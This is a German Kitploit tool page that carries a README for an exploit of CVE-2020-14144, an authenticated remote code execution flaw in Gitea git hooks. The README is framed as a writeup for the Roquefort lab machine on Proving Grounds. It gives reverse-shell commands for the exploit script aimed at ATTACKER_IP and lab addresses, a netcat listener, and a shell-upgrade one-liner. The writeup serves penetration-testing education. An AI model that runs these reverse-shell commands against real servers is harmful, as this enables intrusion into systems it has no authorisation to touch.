Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Gitea-Git-Hooks-RCE-CVE-2020-14144- — Gitea Versionen 1.1.0 → 1.12.5 erlauben authentifizierten Benutzern mit der Berechtigung "May create git hooks", beliebige Shell-Befehle in Post-Receive-Hooks einzuschleusen. Das Pushen eines Commits löst den Hook aus und führt die Nutzlast auf dem Server aus. | Kitploit
Tools/GitHubGitHub/mohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubmohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-

Gitea-Git-Hooks-RCE-CVE-2020-14144-

Gitea Versionen 1.1.0 → 1.12.5 erlauben authentifizierten Benutzern mit der Berechtigung "May create git hooks", beliebige Shell-Befehle in Post-Receive-Hooks einzuschleusen. Das Pushen eines Commits löst den Hook aus und führt die Nutzlast auf dem Server aus.

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Gitea Git Hooks RCE (CVE-2020-14144)

OffsecProvingGrounds Übung — Roquefort Maschine Writeup & POC

Überblick

ElementDetail
MaschineRoquefort (Proving Grounds Practice)
BetriebssystemLinux
Gitea Version1.7.5
CVECVE-2020-14144
VektorAuthentifiziertes RCE via Git Hooks
Benutzer-Shellchloe

Gitea-Versionen 1.1.0 → 1.12.5 erlauben authentifizierten Benutzern mit der Berechtigung "Git Hooks erstellen", beliebige Shell-Befehle in post-receive-Hooks einzuschleusen. Das Pushen eines Commits löst den Hook aus und führt die Payload auf dem Server aus.

Schnellstart

Automatisiert (Python-Skript)

root@kitploit:~
# Linux target — reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os linux

# Windows target — PowerShell reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os windows

Manuell

Siehe MANUAL.md für eine Schritt-für-Schritt-Ausnutzungsanleitung.

Repository-Struktur

root@kitploit:~
.
├── README.md          # This file
├── MANUAL.md          # Manual exploitation guide (Linux + Windows)
└── exploit.py         # Automated exploit script

Voraussetzungen

  • Python 3.6+
  • requests Bibliothek (pip install requests)
  • git auf dem Angreifer-Rechner installiert
  • Gültige Gitea-Anmeldedaten mit Git-Hook-Berechtigungen

Verwendung

root@kitploit:~
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -I REV_IP -P REV_PORT
                  [--os {linux,windows}] [--repo REPO] [-f PAYLOAD_FILE] [-v]

Roquefort — Gitea authentifiziertes RCE via Git Hooks (CVE-2020-14144)

erforderliche Argumente:
  -t, --target       Ziel-Gitea-URL (z.B. http://192.168.x.x:3000)
  -u, --username     Gitea-Benutzername
  -p, --password     Gitea-Passwort
  -I, --rev-ip       Angreifer-Listener-IP
  -P, --rev-port     Angreifer-Listener-Port

optionale Argumente:
  --os               Ziel-Betriebssystem: linux (Standard) oder windows
  --repo             Name des zu erstellenden Repositorys (Standard: exploit)
  -f, --payload-file Benutzerdefinierte Shell-Skript-Payload-Datei
  -v, --verbose      Ausführliche Ausgabe

Beispiele

root@kitploit:~
# 1) Start listener
nc -lvnp 4444

# 2) Run exploit (Linux target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444

# 3) Run exploit (Windows target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 --os windows

# 4) Custom payload file
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 -f payload.sh

Shell-Upgrade (Post-Exploitation)

Nach der Annahme der Reverse-Shell:

root@kitploit:~
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg

Fehlerbehebung

ProblemLösung
fatal: dubious ownershipKlone von ~ anstatt von freigegebenen Ordnern, oder führe git config --global --add safe.directory '*' aus
Keine Verbindung empfangenÜberprüfe Angreifer-IP, Firewall, bestätige beide Maschinen im selben Subnetz
Hook feuert, aber keine ShellTeste zuerst mit touch /tmp/pwned-Payload — wenn die Datei erscheint, wird die Reverse-Shell blockiert
Zugriff auf Hooks verweigertBenutzer hat keine Hook-Berechtigungen — benötigt Admin- oder 'Git Hooks erstellen'-Berechtigung
Portkonflikt auf 3000Gitea verwendet 3000 — verwende einen anderen Port wie 4444 für deinen Listener

Referenzen

  • CVE-2020-14144 — NVD
  • Gitea Issue #13058
  • p0dalirius Original POC

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Penetrationstests und zu Bildungszwecken bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie es verantwortungsbewusst.

Tool herunterladen